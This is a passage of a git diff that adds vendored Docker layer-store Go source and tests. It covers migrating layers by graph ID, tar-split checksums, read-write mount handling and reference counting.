+	"os"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/vbatts/tar-split/tar/asm"
+	"github.com/vbatts/tar-split/tar/storage"
+)
+
+// CreateRWLayerByGraphID creates a RWLayer in the layer store using
+// the provided name with the given graphID. To get the RWLayer
+// after migration the layer may be retrieved by the given name.
+func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) {
+	ls.mountL.Lock()
+	defer ls.mountL.Unlock()
+	m, ok := ls.mounts[name]
+	if ok {
+		if m.parent.chainID != parent {
+			return errors.New("name conflict, mismatched parent")
+		}
+		if m.mountID != graphID {
+			return errors.New("mount already exists")
+		}
+
+		return nil
+	}
+
+	if !ls.driver.Exists(graphID) {
+		return fmt.Errorf("graph ID does not exist: %q", graphID)
+	}
+
+	var p *roLayer
+	if string(parent) != "" {
+		p = ls.get(parent)
+		if p == nil {
+			return ErrLayerDoesNotExist
+		}
+
+		// Release parent chain if error
+		defer func() {
+			if err != nil {
+				ls.layerL.Lock()
+				ls.releaseLayer(p)
+				ls.layerL.Unlock()
+			}
+		}()
+	}
+
+	// TODO: Ensure graphID has correct parent
+
+	m = &mountedLayer{
+		name:       name,
+		parent:     p,
+		mountID:    graphID,
+		layerStore: ls,
+		references: map[RWLayer]*referencedRWLayer{},
+	}
+
+	// Check for existing init layer
+	initID := fmt.Sprintf("%s-init", graphID)
+	if ls.driver.Exists(initID) {
+		m.initID = initID
+	}
+
+	if err = ls.saveMount(m); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) {
+	defer func() {
+		if err != nil {
+			logrus.Debugf("could not get checksum for %q with tar-split: %q", id, err)
+			diffID, size, err = ls.checksumForGraphIDNoTarsplit(id, parent, newTarDataPath)
+		}
+	}()
+
+	if oldTarDataPath == "" {
+		err = errors.New("no tar-split file")
+		return
+	}
+
+	tarDataFile, err := os.Open(oldTarDataPath)
+	if err != nil {
+		return
+	}
+	defer tarDataFile.Close()
+	uncompressed, err := gzip.NewReader(tarDataFile)
+	if err != nil {
+		return
+	}
+
+	dgst := digest.Canonical.New()
+	err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash())
+	if err != nil {
+		return
+	}
+
+	diffID = DiffID(dgst.Digest())
+	err = os.RemoveAll(newTarDataPath)
+	if err != nil {
+		return
+	}
+	err = os.Link(oldTarDataPath, newTarDataPath)
+
+	return
+}
+
+func (ls *layerStore) checksumForGraphIDNoTarsplit(id, parent, newTarDataPath string) (diffID DiffID, size int64, err error) {
+	rawarchive, err := ls.driver.Diff(id, parent)
+	if err != nil {
+		return
+	}
+	defer rawarchive.Close()
+
+	f, err := os.Create(newTarDataPath)
+	if err != nil {
+		return
+	}
+	defer f.Close()
+	mfz := gzip.NewWriter(f)
+	defer mfz.Close()
+	metaPacker := storage.NewJSONPacker(mfz)
+
+	packerCounter := &packSizeCounter{metaPacker, &size}
+
+	archive, err := asm.NewInputTarStream(rawarchive, packerCounter, nil)
+	if err != nil {
+		return
+	}
+	dgst, err := digest.FromReader(archive)
+	if err != nil {
+		return
+	}
+	diffID = DiffID(dgst)
+	return
+}
+
+func (ls *layerStore) RegisterByGraphID(graphID string, parent ChainID, diffID DiffID, tarDataFile string, size int64) (Layer, error) {
+	// err is used to hold the error which will always trigger
+	// cleanup of creates sources but may not be an error returned
+	// to the caller (already exists).
+	var err error
+	var p *roLayer
+	if string(parent) != "" {
+		p = ls.get(parent)
+		if p == nil {
+			return nil, ErrLayerDoesNotExist
+		}
+
+		// Release parent chain if error
+		defer func() {
+			if err != nil {
+				ls.layerL.Lock()
+				ls.releaseLayer(p)
+				ls.layerL.Unlock()
+			}
+		}()
+	}
+
+	// Create new roLayer
+	layer := &roLayer{
+		parent:         p,
+		cacheID:        graphID,
+		referenceCount: 1,
+		layerStore:     ls,
+		references:     map[Layer]struct{}{},
+		diffID:         diffID,
+		size:           size,
+		chainID:        createChainIDFromParent(parent, diffID),
+	}
+
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil {
+		// Set error for cleanup, but do not return
+		err = errors.New("layer already exists")
+		return existingLayer.getReference(), nil
+	}
+
+	tx, err := ls.store.StartTransaction()
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			logrus.Debugf("Cleaning up transaction after failed migration for %s: %v", graphID, err)
+			if err := tx.Cancel(); err != nil {
+				logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err)
+			}
+		}
+	}()
+
+	tsw, err := tx.TarSplitWriter(false)
+	if err != nil {
+		return nil, err
+	}
+	defer tsw.Close()
+	tdf, err := os.Open(tarDataFile)
+	if err != nil {
+		return nil, err
+	}
+	defer tdf.Close()
+	_, err = io.Copy(tsw, tdf)
+	if err != nil {
+		return nil, err
+	}
+
+	if err = storeLayer(tx, layer); err != nil {
+		return nil, err
+	}
+
+	if err = tx.Commit(layer.chainID); err != nil {
+		return nil, err
+	}
+
+	ls.layerMap[layer.chainID] = layer
+
+	return layer.getReference(), nil
+}
+
+type unpackSizeCounter struct {
+	unpacker storage.Unpacker
+	size     *int64
+}
+
+func (u *unpackSizeCounter) Next() (*storage.Entry, error) {
+	e, err := u.unpacker.Next()
+	if err == nil && u.size != nil {
+		*u.size += e.Size
+	}
+	return e, err
+}
+
+type packSizeCounter struct {
+	packer storage.Packer
+	size   *int64
+}
+
+func (p *packSizeCounter) AddEntry(e storage.Entry) (int, error) {
+	n, err := p.packer.AddEntry(e)
+	if err == nil && p.size != nil {
+		*p.size += e.Size
+	}
+	return n, err
+}
diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go
new file mode 100644
index 0000000000..07b4b68f8f
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/migration_test.go
@@ -0,0 +1,435 @@
+package layer
+
+import (
+	"bytes"
+	"compress/gzip"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/vbatts/tar-split/tar/asm"
+	"github.com/vbatts/tar-split/tar/storage"
+)
+
+func writeTarSplitFile(name string, tarContent []byte) error {
+	f, err := os.OpenFile(name, os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	fz := gzip.NewWriter(f)
+
+	metaPacker := storage.NewJSONPacker(fz)
+	defer fz.Close()
+
+	rdr, err := asm.NewInputTarStream(bytes.NewReader(tarContent), metaPacker, nil)
+	if err != nil {
+		return err
+	}
+
+	if _, err := io.Copy(ioutil.Discard, rdr); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func TestLayerMigration(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	td, err := ioutil.TempDir("", "migration-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(td)
+
+	layer1Files := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644),
+		newTestFile("/etc/profile", []byte("# Base configuration"), 0644),
+	}
+
+	layer2Files := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644),
+	}
+
+	tar1, err := tarFromFiles(layer1Files...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tar2, err := tarFromFiles(layer2Files...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graphID1 := stringid.GenerateRandomID()
+	if err := graph.Create(graphID1, "", nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := graph.ApplyDiff(graphID1, "", bytes.NewReader(tar1)); err != nil {
+		t.Fatal(err)
+	}
+
+	tf1 := filepath.Join(td, "tar1.json.gz")
+	if err := writeTarSplitFile(tf1, tar1); err != nil {
+		t.Fatal(err)
+	}
+
+	fms, err := NewFSMetadataStore(filepath.Join(td, "layers"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	ls, err := NewStoreFromGraphDriver(fms, graph)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	newTarDataPath := filepath.Join(td, ".migration-tardata")
+	diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", tf1, newTarDataPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1b, err := ls.Register(bytes.NewReader(tar1), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertReferences(t, layer1a, layer1b)
+	// Attempt register, should be same
+	layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graphID2 := stringid.GenerateRandomID()
+	if err := graph.Create(graphID2, graphID1, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := graph.ApplyDiff(graphID2, graphID1, bytes.NewReader(tar2)); err != nil {
+		t.Fatal(err)
+	}
+
+	tf2 := filepath.Join(td, "tar2.json.gz")
+	if err := writeTarSplitFile(tf2, tar2); err != nil {
+		t.Fatal(err)
+	}
+	diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, tf2, newTarDataPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, tf2, size)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertReferences(t, layer2a, layer2b)
+
+	if metadata, err := ls.Release(layer2a); err != nil {
+		t.Fatal(err)
+	} else if len(metadata) > 0 {
+		t.Fatalf("Unexpected layer removal after first release: %#v", metadata)
+	}
+
+	metadata, err := ls.Release(layer2b)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertMetadata(t, metadata, createMetadata(layer2a))
+}
+
+func tarFromFilesInGraph(graph graphdriver.Driver, graphID, parentID string, files ...FileApplier) ([]byte, error) {
+	t, err := tarFromFiles(files...)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := graph.Create(graphID, parentID, nil); err != nil {
+		return nil, err
+	}
+	if _, err := graph.ApplyDiff(graphID, parentID, bytes.NewReader(t)); err != nil {
+		return nil, err
+	}
+
+	ar, err := graph.Diff(graphID, parentID)
+	if err != nil {
+		return nil, err
+	}
+	defer ar.Close()
+
+	return ioutil.ReadAll(ar)
+}
+
+func TestLayerMigrationNoTarsplit(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	td, err := ioutil.TempDir("", "migration-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(td)
+
+	layer1Files := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644),
+		newTestFile("/etc/profile", []byte("# Base configuration"), 0644),
+	}
+
+	layer2Files := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644),
+	}
+
+	graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	graphID1 := stringid.GenerateRandomID()
+	graphID2 := stringid.GenerateRandomID()
+
+	tar1, err := tarFromFilesInGraph(graph, graphID1, "", layer1Files...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	tar2, err := tarFromFilesInGraph(graph, graphID2, graphID1, layer2Files...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	fms, err := NewFSMetadataStore(filepath.Join(td, "layers"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	ls, err := NewStoreFromGraphDriver(fms, graph)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	newTarDataPath := filepath.Join(td, ".migration-tardata")
+	diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", "", newTarDataPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer1b, err := ls.Register(bytes.NewReader(tar1), "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertReferences(t, layer1a, layer1b)
+
+	// Attempt register, should be same
+	layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, "", newTarDataPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, newTarDataPath, size)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertReferences(t, layer2a, layer2b)
+
+	if metadata, err := ls.Release(layer2a); err != nil {
+		t.Fatal(err)
+	} else if len(metadata) > 0 {
+		t.Fatalf("Unexpected layer removal after first release: %#v", metadata)
+	}
+
+	metadata, err := ls.Release(layer2b)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	assertMetadata(t, metadata, createMetadata(layer2a))
+}
+
+func TestMountMigration(t *testing.T) {
+	// TODO Windows: Figure out why this is failing (obvious - paths... needs porting)
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	baseFiles := []FileApplier{
+		newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644),
+		newTestFile("/etc/profile", []byte("# Base configuration"), 0644),
+	}
+	initFiles := []FileApplier{
+		newTestFile("/etc/hosts", []byte{}, 0644),
+		newTestFile("/etc/resolv.conf", []byte{}, 0644),
+	}
+	mountFiles := []FileApplier{
+		newTestFile("/etc/hosts", []byte("localhost 127.0.0.1"), 0644),
+		newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644),
+		newTestFile("/root/testfile1.txt", []byte("nothing valuable"), 0644),
+	}
+
+	initTar, err := tarFromFiles(initFiles...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	mountTar, err := tarFromFiles(mountFiles...)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graph := ls.(*layerStore).driver
+
+	layer1, err := createLayer(ls, "", initWithFiles(baseFiles...))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	graphID1 := layer1.(*referencedCacheLayer).cacheID
+
+	containerID := stringid.GenerateRandomID()
+	containerInit := fmt.Sprintf("%s-init", containerID)
+
+	if err := graph.Create(containerInit, graphID1, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := graph.ApplyDiff(containerInit, graphID1, bytes.NewReader(initTar)); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := graph.Create(containerID, containerInit, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := graph.ApplyDiff(containerID, containerInit, bytes.NewReader(mountTar)); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ls.(*layerStore).CreateRWLayerByGraphID("migration-mount", containerID, layer1.ChainID()); err != nil {
+		t.Fatal(err)
+	}
+
+	rwLayer1, err := ls.GetRWLayer("migration-mount")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := rwLayer1.Mount(""); err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := rwLayer1.Changes()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := 5; len(changes) != expected {
+		t.Logf("Changes %#v", changes)
+		t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected)
+	}
+
+	sortChanges(changes)
+
+	assertChange(t, changes[0], archive.Change{
+		Path: "/etc",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[1], archive.Change{
+		Path: "/etc/hosts",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[2], archive.Change{
+		Path: "/root",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[3], archive.Change{
+		Path: "/root/.bashrc",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[4], archive.Change{
+		Path: "/root/testfile1.txt",
+		Kind: archive.ChangeAdd,
+	})
+
+	if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil {
+		t.Fatal("Expected error creating mount with same name")
+	} else if err != ErrMountNameConflict {
+		t.Fatal(err)
+	}
+
+	rwLayer2, err := ls.GetRWLayer("migration-mount")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if getMountLayer(rwLayer1) != getMountLayer(rwLayer2) {
+		t.Fatal("Expected same layer from get with same name as from migrate")
+	}
+
+	if _, err := rwLayer2.Mount(""); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := rwLayer2.Mount(""); err != nil {
+		t.Fatal(err)
+	}
+
+	if metadata, err := ls.Release(layer1); err != nil {
+		t.Fatal(err)
+	} else if len(metadata) > 0 {
+		t.Fatalf("Expected no layers to be deleted, deleted %#v", metadata)
+	}
+
+	if err := rwLayer1.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := ls.ReleaseRWLayer(rwLayer1); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := rwLayer2.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+	if err := rwLayer2.Unmount(); err != nil {
+		t.Fatal(err)
+	}
+	metadata, err := ls.ReleaseRWLayer(rwLayer2)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(metadata) == 0 {
+		t.Fatal("Expected base layer to be deleted when deleting mount")
+	}
+
+	assertMetadata(t, metadata, createMetadata(layer1))
+}
diff --git a/vendor/github.com/docker/docker/layer/mount_test.go b/vendor/github.com/docker/docker/layer/mount_test.go
new file mode 100644
index 0000000000..7a8637eae9
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/mount_test.go
@@ -0,0 +1,230 @@
+package layer
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"sort"
+	"testing"
+
+	"github.com/docker/docker/pkg/archive"
+)
+
+func TestMountInit(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	basefile := newTestFile("testfile.txt", []byte("base data!"), 0644)
+	initfile := newTestFile("testfile.txt", []byte("init data!"), 0777)
+
+	li := initWithFiles(basefile)
+	layer, err := createLayer(ls, "", li)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	mountInit := func(root string) error {
+		return initfile.ApplyFile(root)
+	}
+
+	m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	path, err := m.Mount("")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	f, err := os.Open(filepath.Join(path, "testfile.txt"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+
+	fi, err := f.Stat()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	b, err := ioutil.ReadAll(f)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := "init data!"; string(b) != expected {
+		t.Fatalf("Unexpected test file contents %q, expected %q", string(b), expected)
+	}
+
+	if fi.Mode().Perm() != 0777 {
+		t.Fatalf("Unexpected filemode %o, expecting %o", fi.Mode().Perm(), 0777)
+	}
+}
+
+func TestMountSize(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	content1 := []byte("Base contents")
+	content2 := []byte("Mutable contents")
+	contentInit := []byte("why am I excluded from the size ☹")
+
+	li := initWithFiles(newTestFile("file1", content1, 0644))
+	layer, err := createLayer(ls, "", li)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	mountInit := func(root string) error {
+		return newTestFile("file-init", contentInit, 0777).ApplyFile(root)
+	}
+
+	m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	path, err := m.Mount("")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	mountSize, err := m.Size()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := len(content2); int(mountSize) != expected {
+		t.Fatalf("Unexpected mount size %d, expected %d", int(mountSize), expected)
+	}
+}
+
+func TestMountChanges(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	ls, _, cleanup := newTestStore(t)
+	defer cleanup()
+
+	basefiles := []FileApplier{
+		newTestFile("testfile1.txt", []byte("base data!"), 0644),
+		newTestFile("testfile2.txt", []byte("base data!"), 0644),
+		newTestFile("testfile3.txt", []byte("base data!"), 0644),
+	}
+	initfile := newTestFile("testfile1.txt", []byte("init data!"), 0777)
+
+	li := initWithFiles(basefiles...)
+	layer, err := createLayer(ls, "", li)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	mountInit := func(root string) error {
+		return initfile.ApplyFile(root)
+	}
+
+	m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	path, err := m.Mount("")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := m.Changes()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := 4; len(changes) != expected {
+		t.Fatalf("Wrong number of changes %d, expected %d", len(changes), expected)
+	}
+
+	sortChanges(changes)
+
+	assertChange(t, changes[0], archive.Change{
+		Path: "/testfile1.txt",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[1], archive.Change{
+		Path: "/testfile2.txt",
+		Kind: archive.ChangeDelete,
+	})
+	assertChange(t, changes[2], archive.Change{
+		Path: "/testfile3.txt",
+		Kind: archive.ChangeModify,
+	})
+	assertChange(t, changes[3], archive.Change{
+		Path: "/testfile4.txt",
+		Kind: archive.ChangeAdd,
+	})
+}
+
+func assertChange(t *testing.T, actual, expected archive.Change) {
+	if actual.Path != expected.Path {
+		t.Fatalf("Unexpected change path %s, expected %s", actual.Path, expected.Path)
+	}
+	if actual.Kind != expected.Kind {
+		t.Fatalf("Unexpected change type %s, expected %s", actual.Kind, expected.Kind)
+	}
+}
+
+func sortChanges(changes []archive.Change) {
+	cs := &changeSorter{
+		changes: changes,
+	}
+	sort.Sort(cs)
+}
+
+type changeSorter struct {
+	changes []archive.Change
+}
+
+func (cs *changeSorter) Len() int {
+	return len(cs.changes)
+}
+
+func (cs *changeSorter) Swap(i, j int) {
+	cs.changes[i], cs.changes[j] = cs.changes[j], cs.changes[i]
+}
+
+func (cs *changeSorter) Less(i, j int) bool {
+	return cs.changes[i].Path < cs.changes[j].Path
+}
diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go
new file mode 100644
index 0000000000..a5cfcfa9bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/mounted_layer.go
@@ -0,0 +1,99 @@
+package layer
+
+import (
+	"io"
+
+	"github.com/docker/docker/pkg/archive"
+)
+
+type mountedLayer struct {
+	name       string
+	mountID    string
+	initID     string
+	parent     *roLayer
+	path       string
+	layerStore *layerStore
+
+	references map[RWLayer]*referencedRWLayer
+}
+
+func (ml *mountedLayer) cacheParent() string {
+	if ml.initID != "" {
+		return ml.initID
+	}
+	if ml.parent != nil {
+		return ml.parent.cacheID
+	}
+	return ""
+}
+
+func (ml *mountedLayer) TarStream() (io.ReadCloser, error) {
+	return ml.layerStore.driver.Diff(ml.mountID, ml.cacheParent())
+}
+
+func (ml *mountedLayer) Name() string {
+	return ml.name
+}
+
+func (ml *mountedLayer) Parent() Layer {
+	if ml.parent != nil {
+		return ml.parent
+	}
+
+	// Return a nil interface instead of an interface wrapping a nil
+	// pointer.
+	return nil
+}
+
+func (ml *mountedLayer) Size() (int64, error) {
+	return ml.layerStore.driver.DiffSize(ml.mountID, ml.cacheParent())
+}
+
+func (ml *mountedLayer) Changes() ([]archive.Change, error) {
+	return ml.layerStore.driver.Changes(ml.mountID, ml.cacheParent())
+}
+
+func (ml *mountedLayer) Metadata() (map[string]string, error) {
+	return ml.layerStore.driver.GetMetadata(ml.mountID)
+}
+
+func (ml *mountedLayer) getReference() RWLayer {
+	ref := &referencedRWLayer{
+		mountedLayer: ml,
+	}
+	ml.references[ref] = ref
+
+	return ref
+}
+
+func (ml *mountedLayer) hasReferences() bool {
+	return len(ml.references) > 0
+}
+
+func (ml *mountedLayer) deleteReference(ref RWLayer) error {
+	if _, ok := ml.references[ref]; !ok {
+		return ErrLayerNotRetained
+	}
+	delete(ml.references, ref)
+	return nil
+}
+
+func (ml *mountedLayer) retakeReference(r RWLayer) {
+	if ref, ok := r.(*referencedRWLayer); ok {
+		ml.references[ref] = ref
+	}
+}
+
+type referencedRWLayer struct {
+	*mountedLayer
+}
+
+func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) {
+	return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel)
+}
+
+// Unmount decrements the activity count and unmounts the underlying layer
+// Callers should only call `Unmount` once per call to `Mount`, even on error.
+func (rl *referencedRWLayer) Unmount() error {
+	return rl.layerStore.driver.Put(rl.mountedLayer.mountID)
+}
diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go
new file mode 100644
index 0000000000..7c8d233a35
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/ro_layer.go
@@ -0,0 +1,192 @@
+package layer
+
+import (
+	"fmt"
+	"io"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+)
+
+type roLayer struct {
+	chainID    ChainID
+	diffID     DiffID
+	parent     *roLayer
+	cacheID    string
+	size       int64
+	layerStore *layerStore
+	descriptor distribution.Descriptor
+
+	referenceCount int
+	references     map[Layer]struct{}
+}
+
+// TarStream for roLayer guarentees that the data that is produced is the exact
+// data that the layer was registered with.
+func (rl *roLayer) TarStream() (io.ReadCloser, error) {
+	r, err := rl.layerStore.store.TarSplitReader(rl.chainID)
+	if err != nil {
+		return nil, err
+	}
+
+	pr, pw := io.Pipe()
+	go func() {
+		err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw)
+		if err != nil {
+			pw.CloseWithError(err)
+		} else {
+			pw.Close()
+		}
+	}()
+	rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID))
+	if err != nil {
+		return nil, err
+	}
+	return rc, nil
+}
+
+// TarStreamFrom does not make any guarentees to the correctness of the produced
+// data. As such it should not be used when the layer content must be verified
+// to be an exact match to the registered layer.
+func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) {
+	var parentCacheID string
+	for pl := rl.parent; pl != nil; pl = pl.parent {
+		if pl.chainID == parent {
+			parentCacheID = pl.cacheID
+			break
+		}
+	}
+
+	if parent != ChainID("") && parentCacheID == "" {
+		return nil, fmt.Errorf("layer ID '%s' is not a parent of the specified layer: cannot provide diff to non-parent", parent)
+	}
+	return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID)
+}
+
+func (rl *roLayer) ChainID() ChainID {
+	return rl.chainID
+}
+
+func (rl *roLayer) DiffID() DiffID {
+	return rl.diffID
+}
+
+func (rl *roLayer) Parent() Layer {
+	if rl.parent == nil {
+		return nil
+	}
+	return rl.parent
+}
+
+func (rl *roLayer) Size() (size int64, err error) {
+	if rl.parent != nil {
+		size, err = rl.parent.Size()
+		if err != nil {
+			return
+		}
+	}
+
+	return size + rl.size, nil
+}
+
+func (rl *roLayer) DiffSize() (size int64, err error) {
+	return rl.size, nil
+}
+
+func (rl *roLayer) Metadata() (map[string]string, error) {
+	return rl.layerStore.driver.GetMetadata(rl.cacheID)
+}
+
+type referencedCacheLayer struct {
+	*roLayer
+}
+
+func (rl *roLayer) getReference() Layer {
+	ref := &referencedCacheLayer{
+		roLayer: rl,
+	}
+	rl.references[ref] = struct{}{}
+
+	return ref
+}
+
+func (rl *roLayer) hasReference(ref Layer) bool {
+	_, ok := rl.references[ref]
+	return ok
+}
+
+func (rl *roLayer) hasReferences() bool {
+	return len(rl.references) > 0
+}
+
+func (rl *roLayer) deleteReference(ref Layer) {
+	delete(rl.references, ref)
+}
+
+func (rl *roLayer) depth() int {
+	if rl.parent == nil {
+		return 1
+	}
+	return rl.parent.depth() + 1
+}
+
+func storeLayer(tx MetadataTransaction, layer *roLayer) error {
+	if err := tx.SetDiffID(layer.diffID); err != nil {
+		return err
+	}
+	if err := tx.SetSize(layer.size); err != nil {
